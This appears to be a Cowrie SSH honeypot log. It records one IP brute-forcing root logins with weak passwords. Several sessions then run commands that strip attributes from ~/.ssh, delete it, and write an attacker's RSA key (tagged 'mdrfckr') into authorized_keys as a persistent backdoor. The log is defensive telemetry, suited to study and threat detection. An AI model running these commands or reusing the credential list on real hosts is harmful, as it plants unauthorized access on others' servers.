{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:35.434246Z","src_ip":"212.227.235.229","session":"f86c8a25615f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:35.637238Z","src_ip":"212.227.235.229","session":"f86c8a25615f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:59:36.490328Z","src_ip":"212.227.235.229","session":"f86c8a25615f"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:36.695374Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:36.696233Z","src_ip":"212.227.235.229","session":"f86c8a25615f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59048,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a82b98894a0","protocol":"ssh","message":"New connection: 212.227.235.229:59048 (1.2.3.4:22) [session: 6a82b98894a0]","sensor":"my-vps","timestamp":"2025-09-08T21:59:48.720577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:48.721663Z","src_ip":"212.227.235.229","session":"6a82b98894a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:49.048475Z","src_ip":"212.227.235.229","session":"6a82b98894a0"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"1234567","message":"login attempt [usertest/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T21:59:50.395586Z","src_ip":"212.227.235.229","session":"6a82b98894a0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:51.724100Z","src_ip":"212.227.235.229","session":"6a82b98894a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36334,"dst_ip":"1.2.3.4","dst_port":22,"session":"326dcc369dfd","protocol":"ssh","message":"New connection: 212.227.235.229:36334 (1.2.3.4:22) [session: 326dcc369dfd]","sensor":"my-vps","timestamp":"2025-09-08T21:59:54.269672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:54.270461Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:54.440353Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx3edc","message":"login attempt [root/!QAZ2wsx3edc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:59:55.152828Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:59:55.541549Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:59:55.542215Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:59:55.543075Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:55.712208Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:59:56.069589Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.070307Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.240378Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.241387Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36348,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb64577770e4","protocol":"ssh","message":"New connection: 212.227.235.229:36348 (1.2.3.4:22) [session: bb64577770e4]","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.410535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.413212Z","src_ip":"212.227.235.229","session":"bb64577770e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:56.582411Z","src_ip":"212.227.235.229","session":"bb64577770e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:59:57.264611Z","src_ip":"212.227.235.229","session":"bb64577770e4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.437353Z","src_ip":"212.227.235.229","session":"bb64577770e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36360,"dst_ip":"1.2.3.4","dst_port":22,"session":"08186c787235","protocol":"ssh","message":"New connection: 212.227.235.229:36360 (1.2.3.4:22) [session: 08186c787235]","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.628141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.628982Z","src_ip":"212.227.235.229","session":"08186c787235"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.808689Z","src_ip":"212.227.235.229","session":"08186c787235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59788,"dst_ip":"1.2.3.4","dst_port":22,"session":"23c976c239cc","protocol":"ssh","message":"New connection: 212.227.235.229:59788 (1.2.3.4:22) [session: 23c976c239cc]","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.815643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:58.816391Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:59.149951Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:59:59.571172Z","src_ip":"212.227.235.229","session":"08186c787235"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:59.738999Z","src_ip":"212.227.235.229","session":"326dcc369dfd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:59.752371Z","src_ip":"212.227.235.229","session":"08186c787235"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz!qaz","message":"login attempt [root/1qaz!qaz] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:00:00.519711Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:00:01.265267Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:00:01.266377Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:00:01.267913Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:01.604533Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:00:02.435488Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:00:02.436455Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:00:02.774027Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:02.775650Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59800,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f9e2837a345","protocol":"ssh","message":"New connection: 212.227.235.229:59800 (1.2.3.4:22) [session: 4f9e2837a345]","sensor":"my-vps","timestamp":"2025-09-08T22:00:03.100590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:03.102272Z","src_ip":"212.227.235.229","session":"4f9e2837a345"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:03.432196Z","src_ip":"212.227.235.229","session":"4f9e2837a345"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:00:04.792408Z","src_ip":"212.227.235.229","session":"4f9e2837a345"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:06.123695Z","src_ip":"212.227.235.229","session":"4f9e2837a345"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36862,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8386484ae84","protocol":"ssh","message":"New connection: 212.227.235.229:36862 (1.2.3.4:22) [session: b8386484ae84]","sensor":"my-vps","timestamp":"2025-09-08T22:00:06.455519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:06.456769Z","src_ip":"212.227.235.229","session":"b8386484ae84"}
